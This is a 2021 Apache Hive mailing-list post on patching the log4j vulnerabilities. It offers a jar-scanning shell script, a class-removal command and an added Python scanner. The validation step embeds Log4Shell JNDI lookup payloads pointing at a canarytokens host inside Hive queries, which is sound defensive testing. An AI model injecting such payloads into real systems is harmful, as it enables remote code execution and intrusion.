Posted to dev@hive.apache.org by Zoltan Haindrich <ki...@rxd.hu> on 2021/12/15 11:11:15 UTC

Recent log4j vulnerabilities

Hello all!

In the past week there were 2 new log4j vulnerabilities discovered (CVE-2021-45046, CVE-2021-44228) - and since we use log4j in Hive, existing installations might be affected as well.

Doing a new Hive release on any existing line would probably need a longer timeframe - and doing an upgrade would probably cause further problems for existing installations; for now I'll try to give some help with patching existing clusters.

My understanding is that both CVEs can be fixed by following one of these options:
* remove the JndiLookup.class from the affected jars
* replace the jar with the 2.16.0 version

To identify the affected jars, you could run this script (it ignores 2.16.0 jars if there are any):

# the two variables are exported so that the inner "bash -c" below can see $mc
export pat=org/apache/logging/log4j/core/lookup/JndiLookup.class \
       mc=org/apache/logging/log4j/core/pattern/MessagePatternConverter.class
find . -name '*.jar' | xargs -n1 -IJAR unzip -t JAR \
  | fgrep -f <(echo "$pat"; echo 'Archive:') | grep -B1 "$pat" | grep '^Archive:' \
  | cut -d '/' -f2- \
  | xargs -n1 -IJAR bash -c 'unzip -p JAR "$mc" | md5sum | paste - <(echo JAR)' \
  | fgrep -vf <(echo 374fa1c796465d8f542bb85243240555)

You could remove the JndiLookup.class from the identified jars with something similar to this:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
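As an added example (not part of this mail, Python standard library only), the same two steps as a script: list every jar that still contains JndiLookup.class, descending into jars bundled inside uber jars, report the log4j version from the manifest, and strip the class in place. The sample jar tree it builds is constructed for a dry run.

```python
# Added example (not part of the mail): find jars, including jars bundled inside uber jars,
# that still ship JndiLookup.class, and strip the class in place.
import io, os, re, tempfile, zipfile
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"

def _scan(source, label, hits):
    """Record `label` if the jar at `source` (path or file object) carries JndiLookup.class, then descend into bundled jars."""
    try:
        zf = zipfile.ZipFile(source)
    except zipfile.BadZipFile:
        return  # corrupt or not really a jar: keep scanning the rest
    with zf:
        names = zf.namelist()
        if JNDI_CLASS in names:
            text = zf.read(MANIFEST).decode("utf-8", "replace") if MANIFEST in names else ""
            m = re.search(r"^Implementation-Version:\s*(\S+)", text, re.M)
            hits.append((label, m.group(1) if m else None))
        for name in (n for n in names if n.endswith(".jar")):
            _scan(io.BytesIO(zf.read(name)), f"{label}!{name}", hits)

def find_vulnerable_jars(root):
    """Return [(jar_label, version_or_None)] for every jar with JndiLookup.class."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.endswith(".jar"):
                _scan(os.path.join(dirpath, f), os.path.join(dirpath, f), hits)
    return hits

def strip_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class; True if the class was present."""
    tmp = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        removed = JNDI_CLASS in src.namelist()
        for item in src.infolist():
            if item.filename != JNDI_CLASS:
                dst.writestr(item, src.read(item.filename))
    os.replace(tmp, jar_path)  # atomic swap, so a crash never leaves a half-written jar
    return removed

def build_sample_tree():
    """Constructed fixture: a vulnerable log4j-core jar plus an uber jar bundling it."""
    d = tempfile.mkdtemp()
    vuln = os.path.join(d, "log4j-core-2.14.1.jar")
    with zipfile.ZipFile(vuln, "w") as z:
        z.writestr(MANIFEST, "Implementation-Version: 2.14.1\n")
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
    with zipfile.ZipFile(os.path.join(d, "hive-exec-uber.jar"), "w") as z:
        z.write(vuln, "lib/log4j-core-2.14.1.jar")
    return d
```

Nested hits are reported as `outer.jar!inner.jar`; stripping those means rewriting the outer jar, which this script leaves to the operator.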

To validate if you are still affected or not:
* generate a token on https://canarytokens.org/
* try with queries like these (insert your token):
set hive.fetch.task.conversion=none;
create table aa (a string) location 'file:///dfs${jndi:ldap://....canarytokens.com/a}';
select '${jndi:ldap://....canarytokens.com/a}';

cheers,
Zoltan